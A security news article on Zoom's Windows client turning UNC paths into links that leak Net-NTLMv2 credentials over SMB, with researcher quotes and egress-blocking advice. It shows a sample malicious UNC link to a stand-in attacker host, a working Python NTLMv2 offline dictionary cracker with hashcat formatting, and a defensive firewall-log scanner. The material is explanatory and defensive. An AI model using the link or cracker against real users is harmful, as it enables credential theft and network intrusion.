Zoom for Windows users, watch out: the widely used software has a vulnerability that could allow an attacker to steal your operating system credentials.
The vulnerability, which is not currently patched, has come to light as Zoom use has surged in the wake of the coronavirus pandemic. With large numbers of people working from home, they rely on Zoom to connect with colleagues, customers, and partners. Many of these home users reach sensitive work networks over temporary or improvised connections that lack the protection of a corporate firewall.
Embed the network location here
Attacks use the Zoom chat window to send targets a text string that represents a network location from the Windows device they are using. The Zoom client for Windows automatically converts such universal naming convention (UNC) strings, for example \\attacker.example.com\C$, into clickable links. If a target clicks one of these links from a network that does not block outbound SMB, Windows attempts to open the share and, in doing so, sends the Windows username and the corresponding Net-NTLM (NTLMv2) challenge-response hash to the address contained in the link.
Attackers can then use the captured authentication to access shared network resources such as Outlook servers and storage devices. Resources on a Windows network typically accept NTLM authentication, which leaves them open to relay attacks: the attacker forwards the captured authentication to another server as it arrives, with no cracking required. (A Net-NTLMv2 response is not the NT hash itself, so it cannot be used directly in a pass-the-hash attack, but it can also be cracked offline to recover the plaintext password.)
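What actually leaves the machine is an NTLMv2 challenge-response, not the NT hash. The following added example (not from the article, from Hickey or from Zoom) builds that response the way the NTLMv2 scheme defines it, formats it in the USER::DOMAIN:challenge:NTProofStr:blob line that capture tools and hashcat mode 5600 use, and runs an offline dictionary attack against it. The username, domain, password, challenge and blob bytes are constructed for the demo, and MD4 is written out in pure Python because hashlib may not provide it on OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

# Added example, not the article's or Zoom's code: NTLMv2 response construction and
# an offline dictionary attack on a captured response. All inputs are constructed.

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed only because the NT hash is MD4 of the UTF-16LE password."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & _MASK

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a, b, c, d = d, rol((a + F(b, c, d) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rol((a + G(b, c, d) + X[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a, b, c, d = d, rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & _MASK, (b + bb) & _MASK, (c + cc) & _MASK, (d + dd) & _MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The NT hash: what pass-the-hash needs and what the victim never sends over SMB."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_response(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob); response = NTProofStr || blob."""
    proof = hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def hashcat_5600_line(user: str, domain: str, server_challenge: bytes, response: bytes) -> str:
    """Format a captured response the way capture tools and hashcat mode 5600 expect it."""
    return f"{user}::{domain}:{server_challenge.hex()}:{response[:16].hex()}:{response[16:].hex()}"


def crack_ntlmv2(user: str, domain: str, server_challenge: bytes, response: bytes, wordlist):
    """Offline dictionary attack: recompute NTProofStr per candidate and compare."""
    proof, blob = response[:16], response[16:]
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_response(candidate, user, domain, server_challenge, blob)[:16], proof):
            return candidate
    return None


def constructed_capture():
    """Fixed, constructed inputs standing in for one captured SMB authentication."""
    server_challenge = bytes(range(8))          # chosen by the (attacker's) SMB server
    client_challenge = bytes(range(8, 16))      # chosen by the victim's SMB client
    timestamp = b"\x00" * 8                     # FILETIME, zeroed for the demo
    # NTLMv2 client challenge blob: type bytes, reserved, timestamp, client
    # challenge, reserved, AvPairs (only MsvAvEOL here), reserved.
    blob = bytes([1, 1]) + b"\x00" * 6 + timestamp + client_challenge + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4
    response = ntlmv2_response("Winter2020!", "alice", "CORP", server_challenge, blob)
    return server_challenge, response


def demo():
    """Returns (hashcat line, cracked password) for the constructed capture."""
    chal, resp = constructed_capture()
    line = hashcat_5600_line("alice", "CORP", chal, resp)
    cracked = crack_ntlmv2("alice", "CORP", chal, resp, ["password", "letmein", "Winter2020!"])
    return line, cracked


if __name__ == "__main__":
    line, cracked = demo()
    print(line)
    print("recovered password:", cracked)
```

The two attack paths follow directly from the construction: the response is bound to the server challenge, so it only helps an attacker who relays it while that challenge is live, or who can guess the password offline; it cannot be "passed" the way an NT hash can.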
"It's quite a shortcoming of Zoom," said Matthew Hickey, co-founder of the security boutique Hacker House. "It is a very trivial mistake. With more of us working from home now, it is even easier to take advantage of this mistake."
The vulnerability was first described last week by a researcher using the Twitter handle @_g0dmode, who wrote:
"#Zoom chat allows you to post links like \\x.x.x.x\xyz to try to capture Net-NTLM hashes when other users click on them."
– Mitch (@_g0dmode), March 23, 2020
On Tuesday, Hickey expanded on the finding. In a tweet, he showed the Zoom Windows client exposing credentials that could be used to access restricted parts of a Windows network.
"Hi @zoom_us & @NCSC," Hickey wrote. "Here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screenshot below shows an example UNC path link and the disclosed (redacted) credentials." pic.twitter.com/gjWXas7TMO
– Hacker Fantastic (@hackerfantastic), March 31, 2020
The screenshot shows the Windows username as Bluemoon\HackerFantastic, with the Net-NTLM hash displayed immediately below it, although Hickey redacted most of the hash in the image he posted.
Attacks can be carried out by people posing as legitimate meeting participants, or during so-called Zoombombing, in which trolls join a meeting that is not password-protected and bombard everyone else with offensive or harassing images.
While the attack only works against Windows users, Hickey says it can be launched from any Zoom client simply by sending targets a UNC path in a chat message. If a Windows user clicks the link while connected to a computer or network that does not block outbound SMB, Windows sends the credentials over TCP port 445, the port used for Windows SMB file sharing and Active Directory traffic.
If port 445 is closed to the Internet, whether by a device or network firewall or by an ISP that blocks it, the attack will not work. But there is no guarantee that this egress is blocked on the networks of many Zoom users. Over the past month, millions of people have begun working from home without the IT and security support they get in the office, which makes it more likely that port 445 is open, either by oversight or because the port is needed to reach corporate resources.
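One quick way to check that egress, as an added example that is not part of the article: the script below reads Windows Firewall log lines (the pfirewall.log format, which requires logging of allowed connections to be turned on) and flags outbound TCP 445/139 connections to addresses outside the RFC 1918 ranges. The log lines, IP addresses and function names are constructed for the demo.

```python
import ipaddress

# Added example (not part of the article): scan Windows Firewall log lines
# (%systemroot%\System32\LogFiles\Firewall\pfirewall.log format) for outbound
# SMB to addresses outside the internal ranges, i.e. the egress the article says
# should be blocked. The log lines below are constructed for the demo.

SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2020-04-01 10:15:22 ALLOW TCP 192.168.1.20 192.168.1.5 52310 445 0 - 0 0 0 - - - SEND
2020-04-01 10:15:40 ALLOW TCP 192.168.1.20 203.0.113.7 52311 445 0 - 0 0 0 - - - SEND
2020-04-01 10:16:02 DROP TCP 192.168.1.20 198.51.100.9 52312 445 0 - 0 0 0 - - - SEND
2020-04-01 10:16:30 ALLOW TCP 192.168.1.20 203.0.113.7 52313 443 0 - 0 0 0 - - - SEND
2020-04-01 10:17:01 ALLOW TCP 203.0.113.7 192.168.1.20 445 52314 0 - 0 0 0 - - - RECEIVE
"""

# Only these ranges count as "internal". Documentation ranges such as 203.0.113.0/24
# are deliberately left out (ipaddress.is_private would include them) so that they
# behave like Internet hosts in the demo.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445, 139}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_firewall_log(text: str):
    """Yield one dict per data line, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) >= len(fields):
            yield dict(zip(fields, parts))


def find_smb_egress(text: str, only_allowed: bool = True) -> list:
    """Return (time, src, dst, action) for outbound SMB to non-internal hosts.
    With only_allowed=True, DROP lines (egress already blocked) are ignored."""
    hits = []
    for rec in parse_firewall_log(text):
        if rec["protocol"] != "TCP" or rec["path"] != "SEND":
            continue
        if int(rec["dst-port"]) not in SMB_PORTS or is_internal(rec["dst-ip"]):
            continue
        if only_allowed and rec["action"] != "ALLOW":
            continue
        hits.append((rec["time"], rec["src-ip"], rec["dst-ip"], rec["action"]))
    return hits


if __name__ == "__main__":
    for hit in find_smb_egress(SAMPLE_LOG):
        print("outbound SMB to Internet host:", hit)
```

An ALLOW hit means the host was able to complete an SMB connection to an outside address, which is exactly the condition the attack needs; a DROP on the same destination shows the block is working. On a network that legitimately needs SMB to corporate resources over a VPN, add those address ranges to the internal list rather than opening 445 to everything.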
Zoom representatives did not respond to an email sent Tuesday seeking comment for this post. This post will be updated if a response arrives. In the meantime, Windows users should be suspicious of chat messages that contain links. Where possible, users should also ensure that outbound port 445 is either blocked or restricted to trusted addresses on the Internet.